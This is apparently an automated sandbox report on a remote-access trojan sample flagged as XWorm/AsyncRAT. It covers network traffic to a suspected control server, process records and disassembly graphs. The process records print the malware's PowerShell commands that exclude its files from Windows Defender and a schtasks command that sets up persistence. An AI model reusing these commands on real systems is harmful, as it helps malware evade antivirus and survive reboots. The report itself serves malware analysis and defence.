                                                                          Dec 16, 2024 08:36:26.740487099 CET8049730208.95.112.1192.168.2.4
                                                                          Dec 16, 2024 08:36:26.741278887 CET4973080192.168.2.4208.95.112.1
                                                                          Dec 16, 2024 08:36:26.746061087 CET4973080192.168.2.4208.95.112.1
                                                                          Dec 16, 2024 08:36:26.867441893 CET8049730208.95.112.1192.168.2.4
                                                                          Dec 16, 2024 08:36:27.839034081 CET8049730208.95.112.1192.168.2.4
                                                                          Dec 16, 2024 08:36:27.883371115 CET4973080192.168.2.4208.95.112.1
                                                                          Dec 16, 2024 08:37:13.156794071 CET8049730208.95.112.1192.168.2.4
                                                                          Dec 16, 2024 08:37:13.156862020 CET4973080192.168.2.4208.95.112.1
                                                                          Dec 16, 2024 08:37:44.745074987 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:37:44.866060019 CET4899049791147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:37:44.866185904 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:37:44.932198048 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:37:45.051954985 CET4899049791147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:37:58.894043922 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:37:59.013761044 CET4899049791147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:06.756989956 CET4899049791147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:06.757055998 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:08.031300068 CET4973080192.168.2.4208.95.112.1
                                                                          Dec 16, 2024 08:38:08.152837992 CET8049730208.95.112.1192.168.2.4
                                                                          Dec 16, 2024 08:38:09.962058067 CET4979148990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:09.963326931 CET4984648990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:10.083909988 CET4899049791147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:10.084958076 CET4899049846147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:10.085174084 CET4984648990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:10.195744038 CET4984648990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:10.315432072 CET4899049846147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:20.665620089 CET4984648990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:20.785264969 CET4899049846147.185.221.22192.168.2.4
                                                                          Dec 16, 2024 08:38:27.337660074 CET4984648990192.168.2.4147.185.221.22
                                                                          Dec 16, 2024 08:38:27.458909988 CET4899049846147.185.221.22192.168.2.4

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 16, 2024 08:36:26.454912901 CET6063553192.168.2.41.1.1.1
                                                                          Dec 16, 2024 08:36:26.594947100 CET53606351.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 16, 2024 08:36:26.454912901 CET192.168.2.41.1.1.10x5a6Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 16, 2024 08:36:26.594947100 CET1.1.1.1192.168.2.40x5a6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • ip-api.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449730208.95.112.1801184C:\Users\user\Desktop\com surrogate.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 16, 2024 08:36:26.746061087 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Dec 16, 2024 08:36:27.839034081 CET175INHTTP/1.1 200 OK
                                                                          Date: Mon, 16 Dec 2024 07:36:27 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 6
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                          Data Ascii: false


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:02:36:19
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\Desktop\com surrogate.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\com surrogate.exe"
                                                                          Imagebase:0x9b0000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:1
                                                                          Start time:02:36:27
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:02:36:27
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:02:36:42
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:02:36:42
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:02:36:54
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:02:36:54
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:02:37:12
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:02:37:12
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                                                                          Imagebase:0x7ff76f990000
                                                                          File size:235'008 bytes
                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\svchostt.exe
                                                                          Imagebase:0x800000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\svchostt.exe, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 82%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:02:37:49
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\svchostt.exe"
                                                                          Imagebase:0x720000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:02:37:58
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\svchostt.exe"
                                                                          Imagebase:0xd20000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:02:38:01
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\svchostt.exe
                                                                          Imagebase:0xd40000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:20.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:40%
                                                                            Total number of Nodes:10
                                                                            Total number of Limit Nodes:0

                                                                            Executed Functions

                                                                            Function 00007FFD9B7E98B9 Relevance: 5.5, Strings: 3, Instructions: 1792COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 7ffd9b7e98b9-7ffd9b7e994d call 7ffd9b7e8f10 call 7ffd9b7e0388 call 7ffd9b7e80a8 11 7ffd9b7e9981-7ffd9b7e99a4 0->11 12 7ffd9b7e994f-7ffd9b7e9961 0->12 15 7ffd9b7e99aa-7ffd9b7e99b7 11->15 16 7ffd9b7eaa5d-7ffd9b7eaa64 11->16 12->11 17 7ffd9b7e9d18 15->17 18 7ffd9b7e99bd-7ffd9b7e99fb 15->18 19 7ffd9b7eaa6e-7ffd9b7eaa75 16->19 23 7ffd9b7e9d1d-7ffd9b7e9d51 17->23 24 7ffd9b7eaa38-7ffd9b7eaa3e 18->24 25 7ffd9b7e9a01-7ffd9b7e9a1e call 7ffd9b7e8328 18->25 21 7ffd9b7eaa77-7ffd9b7eaa7f 19->21 22 7ffd9b7eaa86 19->22 21->22 26 7ffd9b7eaa81 call 7ffd9b7e0378 21->26 28 7ffd9b7eaa8d 22->28 27 7ffd9b7e9d58-7ffd9b7e9d9a 23->27 29 7ffd9b7eaa92 24->29 30 7ffd9b7eaa40-7ffd9b7eaa57 24->30 25->24 35 7ffd9b7e9a24-7ffd9b7e9a5e 25->35 26->22 43 7ffd9b7e9d9c-7ffd9b7e9dbd 27->43 44 7ffd9b7e9dbf-7ffd9b7e9df3 27->44 28->28 34 7ffd9b7eaa97-7ffd9b7eaad2 29->34 30->15 30->16 41 7ffd9b7eaad7-7ffd9b7eab24 34->41 46 7ffd9b7e9a60-7ffd9b7e9ab3 35->46 47 7ffd9b7e9abd-7ffd9b7e9ae5 35->47 73 7ffd9b7eab4c-7ffd9b7eab87 41->73 74 7ffd9b7eab26-7ffd9b7eab47 41->74 48 7ffd9b7e9dfa-7ffd9b7e9e3c 43->48 44->48 46->47 54 7ffd9b7e9aeb-7ffd9b7e9af8 47->54 55 7ffd9b7ea3d9-7ffd9b7ea401 47->55 71 7ffd9b7e9e61-7ffd9b7e9e95 48->71 72 7ffd9b7e9e3e-7ffd9b7e9e5f 48->72 54->17 59 7ffd9b7e9afe-7ffd9b7e9bf0 54->59 55->24 64 7ffd9b7ea407-7ffd9b7ea414 55->64 139 7ffd9b7e9bf6-7ffd9b7e9cf3 call 7ffd9b7e0358 59->139 140 7ffd9b7ea3b0-7ffd9b7ea3b6 59->140 64->17 66 7ffd9b7ea41a-7ffd9b7ea510 64->66 86 7ffd9b7eab8c-7ffd9b7eabc7 66->86 120 7ffd9b7ea516-7ffd9b7ea579 66->120 76 7ffd9b7e9e9c-7ffd9b7e9fb3 call 7ffd9b7e0358 71->76 72->76 73->86 74->73 151 7ffd9b7e9fd8-7ffd9b7ea00c 76->151 152 7ffd9b7e9fb5-7ffd9b7e9fd6 76->152 94 7ffd9b7eabcc-7ffd9b7eac07 86->94 103 7ffd9b7eac0c-7ffd9b7eac47 94->103 111 7ffd9b7eac4c-7ffd9b7eac87 103->111 122 7ffd9b7eac8c-7ffd9b7eacc7 111->122 120->94 145 7ffd9b7ea57f-7ffd9b7ea5e2 120->145 130 7ffd9b7eaccc-7ffd9b7ead1c 122->130 157 7ffd9b7ead44-7ffd9b7ead78 130->157 158 7ffd9b7ead1e-7ffd9b7ead3f 130->158 139->23 196 7ffd9b7e9cf5-7ffd9b7e9d16 139->196 140->29 141 7ffd9b7ea3bc-7ffd9b7ea3d3 140->141 141->54 141->55 145->103 172 7ffd9b7ea5e8-7ffd9b7ea746 call 7ffd9b7e82a8 145->172 159 7ffd9b7ea013-7ffd9b7ea0aa 151->159 152->159 166 7ffd9b7ead7f 157->166 158->157 159->17 192 7ffd9b7ea0b0-7ffd9b7ea260 call 7ffd9b7e0358 159->192 166->166 172->111 223 7ffd9b7ea74c-7ffd9b7ea8ba 172->223 192->29 243 7ffd9b7ea266-7ffd9b7ea268 192->243 196->27 223->29 261 7ffd9b7ea8c0-7ffd9b7ea8c2 223->261 243->41 245 7ffd9b7ea26e-7ffd9b7ea2ac 243->245 245->34 254 7ffd9b7ea2b2-7ffd9b7ea33d 245->254 268 7ffd9b7ea33f-7ffd9b7ea386 254->268 269 7ffd9b7ea38d-7ffd9b7ea3aa 254->269 261->130 262 7ffd9b7ea8c8-7ffd9b7ea906 261->262 262->122 273 7ffd9b7ea90c-7ffd9b7ea99a 262->273 268->269 269->140 280 7ffd9b7ea99c-7ffd9b7ea9e3 273->280 281 7ffd9b7ea9ea-7ffd9b7eaa19 273->281 280->281 281->29 282 7ffd9b7eaa1b-7ffd9b7eaa32 281->282 282->24 282->64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$L$CAN_^
                                                                            • API String ID: 0-814290195
                                                                            • Opcode ID: 05c7148935a60c04fc822afb369fbfe927a92d0ab0a79f056cc2a9087e953a03
                                                                            • Instruction ID: 3f506514ab1789708d3cba6235bac6ff715f4fc62c886b75c799c43ede51fd10
                                                                            • Opcode Fuzzy Hash: 05c7148935a60c04fc822afb369fbfe927a92d0ab0a79f056cc2a9087e953a03
                                                                            • Instruction Fuzzy Hash: 8DD27270B1870D4FEB58EF6884A9ABDB7E1FF98704F144679E04DD32A5DE34A8418B42
                                                                            Function 00007FFD9B7E9962 Relevance: 5.2, Strings: 3, Instructions: 1408COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 284 7ffd9b7e9962-7ffd9b7e99a4 call 7ffd9b7e0398 288 7ffd9b7e99aa-7ffd9b7e99b7 284->288 289 7ffd9b7eaa5d-7ffd9b7eaa64 284->289 290 7ffd9b7e9d18 288->290 291 7ffd9b7e99bd-7ffd9b7e99fb 288->291 292 7ffd9b7eaa6e-7ffd9b7eaa75 289->292 296 7ffd9b7e9d1d-7ffd9b7e9d51 290->296 297 7ffd9b7eaa38-7ffd9b7eaa3e 291->297 298 7ffd9b7e9a01-7ffd9b7e9a1e call 7ffd9b7e8328 291->298 294 7ffd9b7eaa77-7ffd9b7eaa7f 292->294 295 7ffd9b7eaa86 292->295 294->295 299 7ffd9b7eaa81 call 7ffd9b7e0378 294->299 301 7ffd9b7eaa8d 295->301 300 7ffd9b7e9d58-7ffd9b7e9d9a 296->300 302 7ffd9b7eaa92 297->302 303 7ffd9b7eaa40-7ffd9b7eaa57 297->303 298->297 308 7ffd9b7e9a24-7ffd9b7e9a5e 298->308 299->295 316 7ffd9b7e9d9c-7ffd9b7e9dbd 300->316 317 7ffd9b7e9dbf-7ffd9b7e9df3 300->317 301->301 307 7ffd9b7eaa97-7ffd9b7eaad2 302->307 303->288 303->289 314 7ffd9b7eaad7-7ffd9b7eab24 307->314 319 7ffd9b7e9a60-7ffd9b7e9ab3 308->319 320 7ffd9b7e9abd-7ffd9b7e9ae5 308->320 346 7ffd9b7eab4c-7ffd9b7eab87 314->346 347 7ffd9b7eab26-7ffd9b7eab47 314->347 321 7ffd9b7e9dfa-7ffd9b7e9e3c 316->321 317->321 319->320 327 7ffd9b7e9aeb-7ffd9b7e9af8 320->327 328 7ffd9b7ea3d9-7ffd9b7ea401 320->328 344 7ffd9b7e9e61-7ffd9b7e9e95 321->344 345 7ffd9b7e9e3e-7ffd9b7e9e5f 321->345 327->290 332 7ffd9b7e9afe-7ffd9b7e9bf0 327->332 328->297 337 7ffd9b7ea407-7ffd9b7ea414 328->337 412 7ffd9b7e9bf6-7ffd9b7e9cf3 call 7ffd9b7e0358 332->412 413 7ffd9b7ea3b0-7ffd9b7ea3b6 332->413 337->290 339 7ffd9b7ea41a-7ffd9b7ea510 337->339 359 7ffd9b7eab8c-7ffd9b7eabc7 339->359 393 7ffd9b7ea516-7ffd9b7ea579 339->393 349 7ffd9b7e9e9c-7ffd9b7e9fb3 call 7ffd9b7e0358 344->349 345->349 346->359 347->346 424 7ffd9b7e9fd8-7ffd9b7ea00c 349->424 425 7ffd9b7e9fb5-7ffd9b7e9fd6 349->425 367 7ffd9b7eabcc-7ffd9b7eac07 359->367 376 7ffd9b7eac0c-7ffd9b7eac47 367->376 384 7ffd9b7eac4c-7ffd9b7eac87 376->384 395 7ffd9b7eac8c-7ffd9b7eacc7 384->395 393->367 418 7ffd9b7ea57f-7ffd9b7ea5e2 393->418 403 7ffd9b7eaccc-7ffd9b7ead1c 395->403 430 7ffd9b7ead44-7ffd9b7ead78 403->430 431 7ffd9b7ead1e-7ffd9b7ead3f 403->431 412->296 469 7ffd9b7e9cf5-7ffd9b7e9d16 412->469 413->302 414 7ffd9b7ea3bc-7ffd9b7ea3d3 413->414 414->327 414->328 418->376 445 7ffd9b7ea5e8-7ffd9b7ea746 call 7ffd9b7e82a8 418->445 432 7ffd9b7ea013-7ffd9b7ea0aa 424->432 425->432 439 7ffd9b7ead7f 430->439 431->430 432->290 465 7ffd9b7ea0b0-7ffd9b7ea260 call 7ffd9b7e0358 432->465 439->439 445->384 496 7ffd9b7ea74c-7ffd9b7ea8ba 445->496 465->302 516 7ffd9b7ea266-7ffd9b7ea268 465->516 469->300 496->302 534 7ffd9b7ea8c0-7ffd9b7ea8c2 496->534 516->314 518 7ffd9b7ea26e-7ffd9b7ea2ac 516->518 518->307 527 7ffd9b7ea2b2-7ffd9b7ea33d 518->527 541 7ffd9b7ea33f-7ffd9b7ea386 527->541 542 7ffd9b7ea38d-7ffd9b7ea3aa 527->542 534->403 535 7ffd9b7ea8c8-7ffd9b7ea906 534->535 535->395 546 7ffd9b7ea90c-7ffd9b7ea99a 535->546 541->542 542->413 553 7ffd9b7ea99c-7ffd9b7ea9e3 546->553 554 7ffd9b7ea9ea-7ffd9b7eaa19 546->554 553->554 554->302 555 7ffd9b7eaa1b-7ffd9b7eaa32 554->555 555->297 555->337
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: B$L$CAN_^
                                                                            • API String ID: 0-398831512
                                                                            • Opcode ID: 84d48c25566d76b240f78f95d420c79db3d368e904635f851a55c9b08fee15a4
                                                                            • Instruction ID: 26d332f7495579d387963fd650321d5489f53dea3a48ed3da5baa3f28fbea3f5
                                                                            • Opcode Fuzzy Hash: 84d48c25566d76b240f78f95d420c79db3d368e904635f851a55c9b08fee15a4
                                                                            • Instruction Fuzzy Hash: 2DA27170B18A0D4FEB58EF6884A9AADB7E2FF98704F554579E00DD33A5CE34A8418B41
                                                                            Function 00007FFD9B7E6096 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 557 7ffd9b7e6096-7ffd9b7e60a3 558 7ffd9b7e60a5-7ffd9b7e60ad 557->558 559 7ffd9b7e60ae-7ffd9b7e6177 557->559 558->559 562 7ffd9b7e6179-7ffd9b7e6182 559->562 563 7ffd9b7e61e3 559->563 562->563 565 7ffd9b7e6184-7ffd9b7e6190 562->565 564 7ffd9b7e61e5-7ffd9b7e620a 563->564 572 7ffd9b7e620c-7ffd9b7e6215 564->572 573 7ffd9b7e6276 564->573 566 7ffd9b7e61c9-7ffd9b7e61e1 565->566 567 7ffd9b7e6192-7ffd9b7e61a4 565->567 566->564 569 7ffd9b7e61a6 567->569 570 7ffd9b7e61a8-7ffd9b7e61bb 567->570 569->570 570->570 571 7ffd9b7e61bd-7ffd9b7e61c5 570->571 571->566 572->573 574 7ffd9b7e6217-7ffd9b7e6223 572->574 575 7ffd9b7e6278-7ffd9b7e6320 573->575 576 7ffd9b7e625c-7ffd9b7e6274 574->576 577 7ffd9b7e6225-7ffd9b7e6237 574->577 586 7ffd9b7e6322-7ffd9b7e632c 575->586 587 7ffd9b7e638e 575->587 576->575 579 7ffd9b7e6239 577->579 580 7ffd9b7e623b-7ffd9b7e624e 577->580 579->580 580->580 582 7ffd9b7e6250-7ffd9b7e6258 580->582 582->576 586->587 589 7ffd9b7e632e-7ffd9b7e633b 586->589 588 7ffd9b7e6390-7ffd9b7e63b9 587->588 595 7ffd9b7e63bb-7ffd9b7e63c6 588->595 596 7ffd9b7e6423 588->596 590 7ffd9b7e6374-7ffd9b7e638c 589->590 591 7ffd9b7e633d-7ffd9b7e634f 589->591 590->588 593 7ffd9b7e6351 591->593 594 7ffd9b7e6353-7ffd9b7e6366 591->594 593->594 594->594 597 7ffd9b7e6368-7ffd9b7e6370 594->597 595->596 598 7ffd9b7e63c8-7ffd9b7e63d6 595->598 599 7ffd9b7e6425-7ffd9b7e64b6 596->599 597->590 600 7ffd9b7e63d8-7ffd9b7e63ea 598->600 601 7ffd9b7e640f-7ffd9b7e6421 598->601 607 7ffd9b7e64bc-7ffd9b7e64cb 599->607 602 7ffd9b7e63ec 600->602 603 7ffd9b7e63ee-7ffd9b7e6401 600->603 601->599 602->603 603->603 605 7ffd9b7e6403-7ffd9b7e640b 603->605 605->601 608 7ffd9b7e64d3-7ffd9b7e6538 call 7ffd9b7e6554 607->608 609 7ffd9b7e64cd 607->609 616 7ffd9b7e653a 608->616 617 7ffd9b7e653f-7ffd9b7e6553 608->617 609->608 616->617
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l_Z$l_Z
                                                                            • API String ID: 0-3759237847
                                                                            • Opcode ID: 7224614b654fa84f216a6f6619ec95809e3e0effa38d2516195d3eca8dde3954
                                                                            • Instruction ID: 1ae0eea8e59a519855d33bd0c1858b39a730ec356865028ac3d100349bde4eaf
                                                                            • Opcode Fuzzy Hash: 7224614b654fa84f216a6f6619ec95809e3e0effa38d2516195d3eca8dde3954
